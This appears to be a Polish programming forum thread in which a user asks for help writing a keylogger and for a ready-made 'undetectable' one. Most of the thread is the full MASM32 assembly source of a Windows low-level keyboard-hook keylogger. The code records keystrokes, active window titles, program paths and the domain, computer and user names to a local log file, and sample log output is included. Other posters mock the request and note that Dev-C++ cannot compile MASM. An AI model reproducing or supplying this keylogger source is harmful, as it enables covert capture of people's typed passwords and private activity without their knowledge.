dev. C++ - keylogger


Sierpień 18, 2006
wiec klikam Plik , nowy projekt

w czym najlepiej go napisac , dll , windows fuction ???

czy moglby ktos mi podac link do jakiegos gotowca najlepiej niewykrywalnego thx

to na dole zapisuje sie jako dev czemu nie jako exe? ;/


.model flat, stdcall

option casemap:none






includelib masm32libuser32.lib

includelib masm32libkernel32.lib

includelib masm32libadvapi32.lib

includelib msvcrt.lib

pushz    macro szText:VARARG

    local    nexti

    call    nexti

    db    szText,00h




CopyRight        db        "CopyRight 2005, [email][email protected][/email]"

Vist            db        "  "

hBuffer            dd        ?

hComputerName         db         32  dup(0)

hCurrentThreadPiD     dd         0

hCurrentWindow        dd        0

hDateFormat        db        "dd MMM yyyy", 0

hDomaineName          db         128 dup(0) 

hFile            dd        0

hHook            dd        0

hmodul          MODULEENTRY32      <>

hSnapShot         dd         0

hTimeFormat        db        "hh:mm:ss tt", 0    

hUserName               db         32  dup(0)

msg            MSG        <>

onlyOneCopy        db        "Globalzkl",0



    push     offset onlyOneCopy   ; check to make sure we are the only copy

    push    0           ; of this program running for this user

    push    0           ; for fast user switching we can still have 

      call     CreateMutexA       ; one copy per user running with this check            

    call     GetLastError       ; but if this user is running one already. we exit

    cmp     eax,ERROR_ALREADY_EXISTS

    je     more_than_one_copy    

    xor    ebx, ebx       ; Zero Out ebx

    push    VK_F11       ; this will switch logger off using CTRL+ALT+F11 together

    push    MOD_CONTROL or MOD_ALT

    push    0badfaceh       ; name of register key -> "0BADFACE"

    push    ebx           ; 

    call    RegisterHotKey       ; we got a new hot key

    pushz    "ab"           ; append in binary mode

    pushz    "ZKeyLog.txt"       ; name of log file

    call    fopen           ; open the log file

    add    esp, 2*4       ; all c lib functions need fixup..

    mov    [hFile], eax       ; save our file number

    push    ebx

    call    GetModuleHandleA   ; get our module handle for setting the hook


    push    ebx           ; register our keyboard hook proc and start hooking

    push    eax

    push    offset KeyBoardProc   ; where our hook proc is located

    push    WH_KEYBOARD_LL       ; low level key logger WH_KEYBOARD_LL = 13

    call    SetWindowsHookExA   ; Look MOM no DLL Needed :P

    mov    [hHook], eax       ; ok here is our hook handle for later

    push    ebx           ; We Need to check for messages like our

    push    ebx           ; hot key, so we can close when we get it

    push    ebx

    push    offset msg       ; it will be in the message struct

    call    GetMessageA       ; wait for a message


    push    [hHook]           ; we got the hot key, lets close up house    

    call    UnhookWindowsHookEx   ; make sure we unhook things to be nice

    push    [hFile]           ; close our logfile before we stop

    call    fclose

    add    esp, 04


    push    eax           ; call stop and lets go away

    call    ExitProcess


KeyBoardProc    PROC    nCode:DWORD, wParam:DWORD, lParam:DWORD

    LOCAL    lpKeyState[256]    :BYTE

        LOCAL   lpClassName[64]    :BYTE

    LOCAL    lpCharBuf[32]    :BYTE

           LOCAL   lpDateBuf[12]    :BYTE

        LOCAL   lpTimeBuf[12]    :BYTE

        LOCAL   lpLocalTime    :SYSTEMTIME


    lea    edi, [lpKeyState]   ; lets zero out our buffers

    push    256/4

    pop    ecx

    xor    eax, eax

    rep    stosd           ; sets us up for doubleword from EAX

    mov    eax, wParam

    cmp    eax, WM_KEYUP       ; only need WM_KEYDOWN

    je    next_hook           ; bypass double logging


    cmp    eax, WM_SYSKEYUP   ; only Need WM_SYSKEYDOWN

    je    next_hook           ; bypass double logging 

    call    GetForegroundWindow   ; get handle for currently used window ( specific to NT and after )

    cmp    [hCurrentWindow], eax   ; if its not different to last one saved..

    je    no_window_change       ; bypass all the headings

    mov    [hCurrentWindow], eax   ; save it for use now and compare later

        push     64           ; get the class name

        lea     esi, [lpClassName]

        push     esi

        push     [hCurrentWindow]

        call     GetClassName

        lea     esi, [lpLocalTime]   ; invoke GetLocalTime, ADDR LocalTime

        push     esi

        call     GetLocalTime

        push     12           ; invoke GetDateFormat, NULL, NULL 

        lea     esi, [lpDateBuf]

        push     esi           ; ADDR lpLocalTime, ADDR hDateFormat  

        lea     esi, [hDateFormat]

        push     esi           ; ADDR lpDateBuf, Size of 12

        lea     esi, [lpLocalTime]

        push     esi

        push     0

        push     0

        call     GetDateFormat       ; format the date

        push     12           ; invoke GetTimeFormat, NULL, NULL 

        lea     esi, [lpTimeBuf]

        push     esi           ; ADDR lpLocalTime, ADDR hTimeFormat  

        lea     esi, [hTimeFormat]

        push     esi           ; ADDR lpTimeBuf, Size of 12

        lea     esi, [lpLocalTime]

        push     esi

        push     0

        push     0

        call     GetTimeFormat       ; format the time

    lea     esi, [hCurrentThreadPiD]   ; get the processid that sent the key

    push     esi               ; using the HWND we got earlier from

    mov     eax, [hCurrentWindow]       ; our GetForegroundWindow call        

    push     eax               ; we need it to get the program exe name                

    call     GetWindowThreadProcessId

    mov     ebx, hCurrentThreadPiD       ; remember we are NOT using a DLL so.....

    push     ebx               ; we need to use ToolHelp procs to get

    push     TH32CS_SNAPMODULE       ; the program exe name of who sent us

    call     CreateToolhelp32Snapshot   ; this key   

    mov     hSnapShot,eax           ; save the ToolHelp Handle to close later

        mov     hmodul.dwSize, sizeof MODULEENTRY32; need to initialize size or we will fail 


    push    offset hmodul       ; first Module is always module for process

    mov     eax, [hSnapShot]   ; so safe to assume that the exe file name here

    push     eax           ; will always be the right one for us

    call     Module32First

    mov     eax, [hSnapShot]   ; we are done with ToolHelp so we need

        push     eax           ; to tell it we wish to close

        call     CloseHandle


    push    256           ; find the window title text

    lea    esi, [lpKeyState]   ; use lpKeyState it's not being used yet so

    push    esi

    mov    eax, [hCurrentWindow]   ; using the HWND we got from GetForegroundWindow

    push    eax

    call    GetWindowText

    push    offset hmodul.szExePath

        lea     esi, [lpTimeBuf]   ; print the formatted time    

        push    esi

        lea    esi, [lpDateBuf]   ; print the formatted date

        push    esi

    pushz    13,10,"[%s, %s - Program:%s]",13,10

    push    [hFile]            

    call    fprintf           ; write the buffer to cache

    add    esp, 3*4

    lea    esi, [lpClassName]   ; print the Window Class Name

    push    esi

    lea    esi, [lpKeyState]   ; print the Window Title    

    push    esi

    pushz    13,10,"[       Window Title:%s - Window Class:%s]",13,10

    push    [hFile]            

    call    fprintf           ; write the buffer to cache

    add    esp, 3*4

    mov     hBuffer, 128       ; get the current domain name

    push     offset hBuffer

    push     offset hDomaineName

    push     1

    call     GetComputerNameExA

        mov     hBuffer, 32       ; get the current computer name 

        push     offset hBuffer 

        push     offset hComputerName 

        push     0 

        call     GetComputerNameExA

        mov     hBuffer, 32       ; get the current user name

        push     offset hBuffer

        push     offset hUserName

        call     GetUserNameA

    push    offset hUserName   ; print the user name

    push    offset hComputerName   ; print the computer name

    push    offset hDomaineName   ; print the domain name

        pushz     "[       Domain:%s - Computer:%s - User:%s]",13,10

        push    [hFile]

    call    fprintf           ; write to cache

    add    esp, 3*4 


    push    [hFile]

    call    fflush           ; flush data buffer to disk..

    add    esp, 4


    mov    esi, [lParam]       ; we don't want to print shift or capslock names.

    lodsd               ; it just makes the logs easier to read without them.

    cmp    al, VK_LSHIFT       ; they are tested later when distinguishing between

    je    next_hook       ; bypass left shift Key for upper/lowercase characters

    cmp    al, VK_RSHIFT

    je    next_hook       ; bypass right shift Key

    cmp    al, VK_CAPITAL

    je    next_hook       ; bypass caps lock Key

    cmp    al, VK_ESCAPE         

    je    get_name_of_key       ; we Want escape characters

    cmp    al, VK_BACK

    je    get_name_of_key       ; we want backspace key

    cmp    al, VK_TAB             

    je    get_name_of_key       ; we want tab key


    lea    edi, [lpCharBuf]   ; zero initialise buffer for key text

    push    32/4

    pop    ecx

    xor    eax, eax

    rep    stosd


    lea    ebx, [lpKeyState]

    push    ebx

    call    GetKeyboardState       ; get current keyboard state

    push    VK_LSHIFT           ; test if left shift key held down

    call    GetKeyState

    xchg    esi, eax           ; save result in esi


    push    VK_RSHIFT           ; test right..

    call    GetKeyState

    or    eax, esi           ; al == 1 if either key is DOWN


    mov    byte ptr [ebx + 16], al       ; toggle a shift key to on/off


    push    VK_CAPITAL

    call    GetKeyState           ; returns TRUE if caps lock is on    

    mov    byte ptr [ebx + 20], al       ; toggle caps lock to on/off

    mov    esi, [lParam]

    lea    edi, [lpCharBuf]

    push    00h

    push    edi               ; buffer for ascii characters

    push    ebx               ; keyboard state


    xchg    eax, edx


    push    eax               ; hardware scan code

    push    edx               ; virutal key code

    call    ToAscii               ; convert to human readable characters

    test    eax, eax           ; if return zero, continue

    jnz    test_carriage_return       ; else, write to file.

get_name_of_key:           ; no need for large table of pointers to get asciiz 

    mov    esi, [lParam]

    lodsd               ; skip virtual key code

    lodsd               ; eax = scancode

    shl    eax, 16

    xchg    eax, ecx

    lodsd               ; extended key info

    shl    eax, 24

    or    ecx, eax

    push    32

    lea    edi, [lpCharBuf]

    push    edi

    push    ecx

    call    GetKeyNameTextA       ; get the key text

    push    edi

    pushz    "[%s]"           ; print the special key text

    jmp    write_to_file


    push    edi

    pushz    "%s"           ; print regular keys

    cmp    byte ptr [edi], 0dh   ; carriage return?

    jne    write_to_file

    mov    byte ptr [edi + 1], 0ah   ; add linefeed, so logs are easier to read.


    push    [hFile]           ; where we write to the log file

    call    fprintf

    add    esp, 2*4


    push    [lParam]       ; reply for possible other hooks waiting

    push    [wParam]

    push    [nCode]

    push    [hHook]

    call    CallNextHookEx


KeyBoardProc    ENDP

end    main

Sample Log Output Looks like this:

[26 Dec 2005, 02:18:25 PM - Program:C:Program FilesInternet Exploreriexplore.exe]

[       Window Title:broadband ť Forums ť Security ť Whats the best software to monitor my kids..... - Microsoft Internet Explorer provided by Compa - Window Class:IEFrame]

[       Domain:BillyBobs - Computer:Billy - User:Bob]

[26 Dec 2005, 02:18:36 PM - Program:C:WINDOWSsystem32cmd.exe]

[       Window Title:Command Prompt - Window Class:ConsoleWindowClass]

[       Domain:BillyBobs - Computer:Billy - User:Bob]




Marzec 12, 2005
/* Tu byly niemile slowa o kosmicznych malpach... Wykasowalem bo temat rozbawil mnie i zrobilo mi sie zal kosmicznej malpki. */

Za najzabawniejszy temat miesiaca nalezy ci sie oreder usmiech

/* Zrob mi przysluge i nastepnym razem uzyj google i helpa... */


Były Moderator
Grudzień 26, 2005
Re: dev. C++ ,, keylogger

Originally posted by Mazimon
to na dole zapisuje sie jako dev czemu nie jako exe? ;/

.model flat, stdcall

option casemap:none

Czy Dev C++ ma możliwość kompilowania kodu assemblera masm32?
Pomyśl, poczytaj, przecież tak jak my wszyscy jesteś człowiek rozumny (Homo sapiens)...
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